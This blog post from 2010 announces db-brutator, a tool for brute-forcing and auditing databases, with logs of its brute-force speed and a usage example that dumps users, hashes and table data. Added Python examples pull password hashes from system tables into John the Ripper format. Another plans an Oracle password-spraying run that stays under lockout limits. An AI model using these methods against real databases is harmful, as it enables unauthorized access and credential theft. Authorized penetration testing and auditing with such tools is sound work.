Friday, April 30, 2010

DB-BRUTATOR, the multi-database scanner/auditing tool!!

Hi there,

I finally managed to find some time to release one of my tools:

db-brutator is a new database auditing tool written in Perl on top of JDBC drivers. It is similar in spirit to oscanner for Oracle databases, but it does much more than scan for default accounts: it is designed to be flexible and easy to customize.

Why use it?

Because you want to audit every database server with the same efficiency:
  1. Because you want to check a specific configuration against, say, 100 different accounts.
  2. Because you want to brute-force some of those accounts.
  3. Because you want to retrieve all the database user hashes.
  4. Because you want to search for credentials in a huge database.
Features:
  • Simple & efficient design
  • JDBC drivers => it can talk to any database system that ships a JDBC driver
  • 100 % command line interface to be able to automate
  • Custom SQL query
  • Easy database Hash extraction to john format
  • Specific word lists included
  • Multi-threaded
  • Unique of its kind (to my knowledge there is no equivalent on the net)
  • Multi OS (OSX,Linux,Win32)
  • Oracle SID bruteforce
  • Can extract the database structure (databases, tables, columns)
  • Can extract the first X rows of data from each table
  • Designed by a pentester for pentesters :-P
  • Already been tested in "real life" conditions
  • License: let's say it's GPL, but the JDBC drivers are not
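The "hash extraction to john format" bullet deserves a closer look, because john is picky about both the line layout and the --format it is told to use. The following is an added example, not code from db-brutator: it names the well-known system tables the hashes live in, classifies each raw hash by engine and version, and groups the john lines by format. The sample rows are constructed, not dumps from a real server.

```python
"""Added example, not db-brutator code: turn rows pulled from a database's credential
table into lines John the Ripper accepts, split by the --format john needs.
The queries name well-known system tables; the sample rows below are constructed."""
import re

# Where each engine keeps its password hashes (run with a privileged account).
HASH_QUERIES = {
    "mysql":  "SELECT user, password FROM mysql.user",
    "oracle": "SELECT name, password FROM sys.user$ WHERE type# = 1",   # 11g+: also spare4
    "mssql":  "SELECT name, password_hash FROM sys.sql_logins",         # 2000: master..sysxlogins
}

HEX = "[0-9A-Fa-f]"

def john_format(sgbd, h):
    """Map one raw hash string to john's --format name; None if it is not crackable material."""
    h = h.strip()
    if sgbd == "mysql":
        if re.fullmatch(rf"\*{HEX}{{40}}", h):        return "mysql-sha1"  # 4.1+: SHA1(SHA1(pw))
        if re.fullmatch(rf"{HEX}{{16}}", h):          return "mysql"       # pre-4.1 scramble
    elif sgbd == "oracle":
        if re.fullmatch(rf"{HEX}{{16}}", h):          return "oracle"      # DES, salted with username
        if re.match(rf"S:{HEX}{{60}}", h):            return "oracle11"    # 11g spare4: S:<sha1><salt>
    elif sgbd == "mssql":
        if re.fullmatch(rf"0x0100{HEX}{{48}}", h):    return "mssql05"     # 2005: salt + SHA1
        if re.fullmatch(rf"0x0100{HEX}{{88}}", h):    return "mssql"       # 2000: salt + SHA1 + SHA1(upper)
        if re.fullmatch(rf"0x0200{HEX}{{136}}", h):   return "mssql12"     # 2012+: salt + SHA-512
    return None

def to_john(sgbd, rows):
    """rows: (login, hash) tuples as the query returns them.
    Returns ({john_format: ["login:hash", ...]}, [logins whose password field is empty])."""
    by_format, no_password = {}, []
    for login, h in rows:
        if h is None or not h.strip():
            no_password.append(login)       # a finding in itself, report it separately
            continue
        fmt = john_format(sgbd, h)
        if fmt is None:
            continue                        # e.g. Oracle 'EXTERNAL' (OS-authenticated) accounts
        if sgbd == "oracle":
            login = login.upper()           # the username is the salt, john expects it uppercase
        by_format.setdefault(fmt, []).append(f"{login}:{h.strip()}")
    return by_format, no_password

# Constructed sample rows (not dumps from a real server).
SAMPLE_ROWS = {
    "mysql":  [("root", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
               ("legacy", "5d2e19393cc5ef67"),
               ("anon", "")],
    "oracle": [("scott", "F894844C34402B67"),          # the SCOTT/TIGER default
               ("ops$oracle", "EXTERNAL"),
               ("hr", "S:" + "AB" * 30)],
    "mssql":  [("sa", "0x0100" + "12345678" + "AB" * 20),
               ("legacy", "0x0100" + "12345678" + "AB" * 40)],
}

if __name__ == "__main__":
    for sgbd, rows in SAMPLE_ROWS.items():
        by_format, empties = to_john(sgbd, rows)
        for fmt, lines in by_format.items():
            path = f"{sgbd}_{fmt}.john"
            with open(path, "w") as f:
                f.write("\n".join(lines) + "\n")
            print(f"john --format={fmt} {path}")
        for login in empties:
            print(f"{sgbd}: account {login!r} has an empty password")
```

Two things the split buys you: john refuses a file that mixes formats, and the accounts with an empty password field never reach john at all, which is exactly where they would otherwise be silently dropped.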
Performance:
  • It depends on the database; here are the results of the same run (passwords of length 1 to 3 against one account) for each type of server:

MSSQL (jTDS driver):
Starting JDBC driver proxy on port: 63145 with driver: net.sourceforge.jtds.jdbc.Driver
Done !
Bruteforcing Password length: 1 for user: test
Bruteforcing Password length: 2 for user: test
Bruteforcing Password length: 3 for user: test
Stopping JDBC driver proxy on port: 63145
Done !
DB-brutator Scan Finished at 10/08/2009 16:21:45 duration: 2 minutes 23 seconds on host: NA on port: 1433
DB-brutator Scan Speed: 335 auth/sec
MySQL (Connector/J driver):
Starting JDBC driver proxy on port: 60007 with driver: com.mysql.jdbc.Driver
Done !
Bruteforcing Password length: 1 for user: test
Bruteforcing Password length: 2 for user: test
Bruteforcing Password length: 3 for user: test
Stopping JDBC driver proxy on port: 60007
Done !
DB-brutator Scan Finished at 10/08/2009 16:25:21 duration: 2 minutes 46 seconds on host: NA on port: 3306
DB-brutator Scan Speed: 288 auth/sec

Oracle (ojdbc driver):
Starting JDBC driver proxy on port: 64297 with driver: oracle.jdbc.driver.OracleDriver
Done !
Bruteforcing Password length: 1 for user: sys as sysdba
Bruteforcing Password length: 2 for user: sys as sysdba
Bruteforcing Password length: 3 for user: sys as sysdba
DB-brutator Scan Finished at 10/08/2009 16:47:58 duration: 18 minutes 28 seconds on host: NA on port: 1521
DB-brutator Scan Speed: 43 auth/sec


Example:

Here is a typical run to extract as much information as possible once an account (with privileges ;-P) has been discovered: db-brutator lists all database users, grabs their hashes if possible, dumps all tables and columns and finally extracts the first 5 rows of data from each table (option names may be shortened to a unique prefix, as -ho, -th and -col are here):
user@host: ~$ db-brutator -ho 192.168.142.160 -port 3306 -sgbd mysql -logins /usr/local/db-brutator/dict/common_user.dic -dblist -hash -table -col -data 5 -th 1 | spc -c /usr/local/db-brutator/conf/spcrc
Result: (screenshot of the log, colorized with supercat (spc))


Online Help:

Here is the help message printed when you launch db-brutator without any parameters:
Usage:
bin/db-brutator.pl
[-logins loginsfilename or login/passwordfilename]
[-host hostname/ip]
[-port port]
[-sgbd mysql|oracle|mssql|sybase]
(-passwords filename)
(-domain Windows Domain for NTLM auth)
(-dbname sid) => database name (only needed for Oracle, because a SID is required to connect); if this parameter is empty and the database type is Oracle, the SID is brute-forced.
(-thread x)
(-m maxqueuesize) => maximum number of queued entries kept in memory; useful to keep memory bounded when using huge word lists.
(-v verbose)
(-deb debug)
(-delay delay between authentication)
(-o outputfilename)
(-u list user account)
(-dba list dba user account)
(-dblist list databases)
(-hash list user hashes)
(-sql execute custom SQL query)
(-cmd execute custom system command via xp_cmdshell MSSQL/SYBASE only)
(-table list database tables)
(-column list table columns)
(-data N list the N first rows of data)
(-b bruteforce) => brute force mode using the default charset file
(-len max passwd length for bruteforce)
(-char bruteforce charset file)

Important Note:
  • Take care of the account lockout policy on Oracle databases (FAILED_LOGIN_ATTEMPTS in the user's profile); it does not affect the SYS account. The same applies to Windows domain accounts tried through -domain (NTLM), which are subject to the domain's lockout policy.
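The lockout warning above is easy to respect once you know the limits, so here is an added example (not part of db-brutator) of how I would prepare an Oracle run: read FAILED_LOGIN_ATTEMPTS per profile and the account status per user, derive how many guesses each OPEN account can absorb, and order the guesses password-first so every account gets the common defaults before any account is pushed towards its limit. The DBA_ views and columns are Oracle's; the rows are constructed, and the SYS exemption mirrors the note above.

```python
"""Added example, not db-brutator code: before guessing passwords on an Oracle
instance, read the lockout limits and plan the run so no account reaches them.
The views and columns are Oracle's; the rows below are constructed."""

# Read these with any account that can see the DBA_ views.
PROFILE_LIMITS_SQL = ("SELECT profile, limit FROM dba_profiles "
                      "WHERE resource_name = 'FAILED_LOGIN_ATTEMPTS'")
USERS_SQL = "SELECT username, profile, account_status FROM dba_users"

# Constructed query results. A profile limit of 'DEFAULT' inherits the DEFAULT profile's value.
PROFILE_ROWS = [("DEFAULT", "10"), ("APP_PROFILE", "3"), ("SVC_PROFILE", "DEFAULT"),
                ("NOLOCK", "UNLIMITED")]
USER_ROWS = [("SYS", "DEFAULT", "OPEN"), ("SYSTEM", "DEFAULT", "OPEN"),
             ("SCOTT", "DEFAULT", "LOCKED"), ("APPUSER", "APP_PROFILE", "OPEN"),
             ("SVC", "SVC_PROFILE", "OPEN"), ("REPORTS", "NOLOCK", "OPEN")]

LOCKOUT_EXEMPT = {"SYS"}   # SYS is not locked by FAILED_LOGIN_ATTEMPTS (see the note above)

def attempt_budget(profile_rows, user_rows, margin=1):
    """Guesses allowed per OPEN account: limit - margin (the limit-th failure locks it).
    None means unlimited. Assumes the account's failed-login counter is currently zero;
    Oracle only resets it on a successful login, so a stale counter lowers the real budget."""
    raw = dict(profile_rows)

    def limit_of(profile):
        v = raw.get(profile, "DEFAULT")
        if v == "DEFAULT":
            v = raw.get("DEFAULT", "UNLIMITED")
        return None if v == "UNLIMITED" else int(v)

    budget = {}
    for user, profile, status in user_rows:
        if status != "OPEN":
            continue                 # LOCKED / EXPIRED: guessing is pointless and noisy
        lim = None if user in LOCKOUT_EXEMPT else limit_of(profile)
        budget[user] = None if lim is None else max(lim - margin, 0)
    return budget

def plan(budget, passwords):
    """Order guesses password-first ('spraying'): every account sees password N before any
    account sees password N+1, and a capped account stops at its budget. Returns the ordered
    (user, password) list and, per capped account, the passwords left untried."""
    tried = {u: 0 for u in budget}
    order, untried = [], {}
    for pw in passwords:
        for user, b in budget.items():
            if b is not None and tried[user] >= b:
                untried.setdefault(user, []).append(pw)
                continue
            order.append((user, pw))
            tried[user] += 1
    return order, untried

if __name__ == "__main__":
    budget = attempt_budget(PROFILE_ROWS, USER_ROWS)
    order, untried = plan(budget, ["manager", "change_on_install", "oracle", "password"])
    for user, pw in order:
        print(f"try {user}/{pw}")
    for user, pws in untried.items():
        print(f"{user}: {len(pws)} passwords held back to stay under the lockout limit")
```

The held-back passwords are reported rather than tried: a -delay between attempts spreads the load but does not reset Oracle's failed-login counter, so the only safe options for those accounts are a smaller list or a successful login in between.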
Known Bugs or limitations:
  • In brute-force mode some JDBC drivers (jTDS) do not close their connections properly, so after a while you will hit the maximum number of open connections (open file descriptors) allowed on your system.
TODO:
  • Implement a thread-safe print queue
  • Add a regexp to extract credit card numbers (PCI compliance check)
  • Write an Nmap NSE script to launch db-brutator once a known database service is found

Download:
source
debian package
package using repository

Please leave comments and bug reports, and share any improvements you write.

Enjoy database scanning!!